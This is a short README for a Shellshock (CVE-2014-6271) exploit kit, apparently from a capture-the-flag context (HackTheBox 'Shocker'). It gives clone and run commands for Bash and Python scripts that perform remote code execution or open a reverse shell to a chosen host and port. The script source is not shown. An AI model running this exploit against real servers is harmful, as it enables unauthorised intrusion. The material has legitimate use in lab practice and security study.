[Python/Shell] - Tested in HackTheBox - Shocker (Easy) CVE-2014-6271
## How to use
#### Clone the repository (or just copy-paste the one you prefer)
```bash
sudo git clone https://github.com/Gurguii/shellshock.sh
```
#### Run the script
- Bash
```bash
bash shellshock.sh -u <url> -h* <lhost> -p* <lport>
```
- Python
```bash
python3 shellshock.py -u <url> -lh* <lhost> -lp* <lport>
```
Note: default LPORT is 4444, URL required. If just URL given, it will RCE, else it will RSHELL to given lhost and lport
[4.0K] /data/pocs/98e3700e8cf10787889647d1d11694063aae5a9f
├── [ 454] README.md
├── [ 826] shellshock.py
└── [ 580] shellshock.sh
0 directories, 3 files